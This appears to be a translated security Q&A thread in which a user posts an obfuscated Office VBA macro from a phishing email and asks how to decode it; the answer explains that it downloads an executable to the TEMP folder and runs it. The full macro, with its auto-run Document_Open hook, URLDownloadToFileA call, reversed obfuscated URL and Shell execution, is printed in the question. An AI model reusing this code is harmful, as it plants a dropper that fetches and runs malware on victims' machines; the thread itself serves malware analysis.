Deobfuscate office VBA code (malware) [cerrado]

Question

Deobfuscate office VBA code (malware) [cerrado]

#1 de Jeff (2 votos)

2

Me han enviado un correo electrónico malicioso y estoy tratando de averiguar qué hace el código malicioso.

He logrado encontrar la carga útil al descifrar los valores de Chr (), pero el resto del código no se puede reconocer.

        'xsWChLNzlXVGlYZFbEhKDOzjNBrFZHSIl

        'DpcvleMuqWiFyl
        'hyaTdAKzoQinNr


        #If VBA7 Then
        Private Declare PtrSafe Function GZwSeWZyIhNenjnZ Lib kernel32 Alias GetNumaNodeProcessorMask (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJLMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function elVYixgTcfwsAmLJ Lib kernel32 Alias WriteStateContainerValue (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function oclNInPDShbETYbn Lib kernel32 Alias CreateDirectoryExA (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function MoJTLPWYmfKTgbz Lib kernel32 Alias GetConsoleHistoryInfo (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal lzYSEXffcfoThUb As String, ByVal elVYixgTcfwsAmLJDBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZelVYixgTcfwsAmLJ As Long) As Long
        Private Declare PtrSafe Function MuRvBqzFOoCHiUHOJKw Lib kernel32 Alias GetTickCount64 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function PAOKWMEkbYEoQQFQIb Lib kernel32 Alias FT_Exit24 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function lIpXcxrTzTjpyvtA Lib kernel32 Alias GetProductName (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function JUNdgZxoTRSDKy Lib kernel32 Alias FindCloseChangeNotification (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare PtrSafe Function VQBzUNhAGAtJOoF Lib urlmon Alias URLDownloadToFileA (ByVal LGXqVWHEnKiVcwaykFTVOtoYnoTDLwWaNw As Long, ByVal KftlkyaxsIGlyvxXaRq As String, ByVal tEMWFoNKZputSPQzVOtoYnoTDLwWaNw As String, ByVal VOtoYnoTDLwWaNwelVYixgTcfwsAmLJelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJelVYixgTcfwsAmLJVOtoYnoTDLwWaNw As Long) As Long
        Private Declare PtrSafe Function EQYZGelqKWNJRcce Lib kernel32 Alias PrivCopyFileExW (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbnelVYixgTcfwsAmLJ As Long) As Long
        Private Declare PtrSafe Function iwjgRBIGLZpUNGoGTG Lib kernel32 Alias OfferVirtualMemory (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        #Else
        Private Declare Function MuRvBqzFOoCHiUHOJKw Lib kernel32 Alias GetTickCount64 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function PAOKWMEkbYEoQQFQIb Lib kernel32 Alias FT_Exit24 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function lIpXcxrTzTjpyvtA Lib kernel32 Alias GetProductName (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function JUNdgZxoTRSDKy Lib kernel32 Alias FindCloseChangeNotification (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function EQYZGelqKWNJRcce Lib kernel32 Alias PrivCopyFileExW (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbnelVYixgTcfwsAmLJ As Long) As Long
        Private Declare Function iwjgRBIGLZpUNGoGTG Lib kernel32 Alias OfferVirtualMemory (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function VQBzUNhAGAtJOoF Lib urlmon Alias URLDownloadToFileA (ByVal eaNkjdOHzsdMqQQJj As Long, ByVal elVYixgTcfwsAmLJelVYixgTcfwsAmLJ As String, ByVal hyaTdAKzoQinNr As String, ByVal oclNInPDShbETYbnelVYixgTcfwsAmLJ As Long, ByVal MoJTLPWYmfKTgbzoclNInPDShbETYbn As Long) As Long
        Private Declare Function GZwSeWZyIhNenjnZ Lib kernel32 Alias GetNumaNodeProcessorMask (ByVal lzYSEXffcfoThUb As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJLMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJoclNInPDShbETYbn As Long) As Long
        Private Declare Function elVYixgTcfwsAmLJ Lib kernel32 Alias WriteStateContainerValue (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function oclNInPDShbETYbn Lib kernel32 Alias CreateDirectoryExA (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
        Private Declare Function MoJTLPWYmfKTgbz Lib kernel32 Alias GetConsoleHistoryInfo (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal lzYSEXffcfoThUb As String, ByVal elVYixgTcfwsAmLJDBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZelVYixgTcfwsAmLJ As Long) As Long
        #End If

        Function tyfevPUzZSHNUpjYGZwSeWZyIhNenjnZelVYixgTcfwsAmLJ(ByVal AEbtrIvLZRPbVNZDkwQiwTpwOOdeofW As Integer)
        kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY
        If kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY Then
        'GZwSeWZyIhNenjnZoclNInPDShbETYbn=MoJTLPWYmfKTgbz
        End If
        End Function
        Function hbnTqBUKPuGRJiqWZCx(ByVal AEbtrIvLZRPbVNfgVj As String, ByVal hUfrAbrdnkOdGp As String)
        If PSUWksxjZPfDYLXwvxT = rMDsWrTugbpcOBHF Then
        PYcyaTaPAZYqaEfo = ZPrnJJzqaCCtqvTbUx
        'cbxeKGrLfUwXefANSyFxsWChLNzlXVGlYZZPrnJJzqaCCtqvTbUx
        ZPrnJJzqaCCtqvTbUx = PSUWksxjZPfDYLXwvxT
        End If
        VQBzUNhAGAtJOoF 4 - 2 - 2 + 0 + 0, AEbtrIvLZRPbVNfgVj, hUfrAbrdnkOdGp, -4 + 4 + 100 - 100, 0 + 2 - 2
        kulqYfDfxsawQDJKs = tyfevPUzZSHNUpjY
        End Function


        'Dim GwBumCCwetkuJxFBCpItkYuBQhYPrTgw as Boolean
        Private Sub VOtoYnoTDLwWaNw()
        iCQYbaBRKwhBnk = lhkiLXZpbeIyqeoYYT
        kblSRXpqDJMxcL = DBjnUFZaqAWuPymnej(Chr(101) + Chr(120) + Chr(101) + Chr(46) + Chr(Asc(w)) + Chr(Asc(l)) + Chr(98) + Chr(100) + Chr(111) + Chr(Asc(c)) + Chr(47) + Chr(116) + Chr(97) + Chr(99) + Chr(46) + Chr(102) + Chr(109) + Chr(Asc(o)) + Chr(Asc(p)) + Chr(46) + Chr(Asc(a)) + Chr(Asc()) + Chr(Asc()) + Chr(Asc()) + Chr(115) + Chr(Asc(p)) + Chr(116) + Chr(116) + Chr(104))

        If AEbtrIvLZRPbVN = ZDkwQiwTpwOOdeofW Then
        SqgFeQsbOnOMZMke = dhwvEFcKDpsYsyJeZg
        lzYSEXffcfoThUb = LMWHPWrDMfeVqPZuwgu
        End If

        ZKsXGJZRFGCfXvXP = DBjnUFZaqAWuPymnej(ctsalal)

        If vMtgBnwtQByVtExPHr = rSCIQrDtFvkdcUGB Then
        iTWgFywkvRqSPai = ZUqEtJtyPvyDIJuP
        End If

        VJtYenETeqAVMuxRbDY = Environ$(Chr(22# + 22# + 22# + 8# + 10#) + Chr(100 - 100 + 4 + 3 + 50 + 20) + Chr(2 - 2 + 100 - 10 - 5 - 5)) + Chr(2 + 10 + 20 + 30 + 30) & ZKsXGJZRFGCfXvXP

        If jAINgzIjHHlNyJLBCET = snhxHQABbdQMsDkgL Then
        lzYSEXffcfoThUb = LMWHPWrDMfeVqPZuwgu
        End If

        hbnTqBUKPuGRJiqWZCx kblSRXpqDJMxcL, VJtYenETeqAVMuxRbDY 'if jAINgzIjHHlNyJLBCET = snhxHQABbdQMsDkgL Then

        Dim rSCIQrDtFvkdcUGBVJtYenETeqAVMuxRbDY As Currency

        Call Shell(VJtYenETeqAVMuxRbDY, vbNormalFocus) ' Dim rSCIQrDtFvkdcUGBVJtYenETeqAVMuxRbDY as Integer
        QVKciSoAuvfQxE = WIlNjMLmbBEiXU
        End Sub

        Sub Document_Open()
        VOtoYnoTDLwWaNw 'kulqYfDfxsawQDJKstyfevPUzZSHNUpjY
        End Sub

        Private Function EoUkpEUNnhmSKLKUmtAYNRreSwhjqjV(ByVal FbEhKDOzjNBrFZHSIlEoUkpEUNnhmSKL As String)
        TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV


        If KUmtAYNRreSwhjqjV = EoUkpEUNnhmSKL Then
        TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV

        Dim FbEhKDOzjNBrFZHSIl As Currency

        End If

        End Function

        Private Sub eIZAqeJRzrTIWdkoMI()
        oFxRFuVhRCqIsfBH = MRVXJWcClZWEiZqHHU
        End Sub

        Private Function DBjnUFZaqAWuPymnej(lJWzsWzeaVgVJGa)
        If TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV Then
        TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV
        End If
          DBjnUFZaqAWuPymnej = StrReverse(lJWzsWzeaVgVJGa)

        If TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV Then
        KUmtAYNRreSwhjqjV = EoUkpEUNnhmSKL
        End If
        End Function

        Function GZwSeWZyIhNenjnZtyfevPUzZSHNUpjY(ByVal AEbtrIvLZRPbVNZDkwQiwTpwOOdeofW As Integer)
        kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY
        If kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY Then
        'GZwSeWZyIhNenjnZoclNInPDShbETYbn=MoJTLPWYmfKTgbz
        End If
        End Function

¿Qué métodos puedo usar para descifrar / decodificar el siguiente código para entender lo que hace?

He probado el script oledump.py que se encuentra aquí ( enlace ), pero fue en vano.

El código resaltado se puede ver aquí: enlace

obfuscation malware

pregunta user3580480 19.11.2016 - 09:44

fuente

1 respuesta

Lea otras preguntas en las etiquetas obfuscation malware

Cumplimiento de PCI DSS para el cliente Se pueden pasar por alto los firewalls basados en ASN

score 2 · Accepted Answer

VQBzUNhAGAtJOoF es un alias para URLDownloadToFileA

Environ$(Chr(22# + 22# + 22# + 8# + 10#) + Chr(100 - 100 + 4 + 3 + 50 + 20) + Chr(2 - 2 + 100 - 10 - 5 - 5)) + Chr(2 + 10 + 20 + 30 + 30) es igual a "TEMP\"

Por lo general, estos scripts son todos iguales: descargan un ejecutable de Internet a la carpeta TEMP y lo ejecutan (usando la declaración Shell en este código).

Ese ejecutable es el código malicioso real.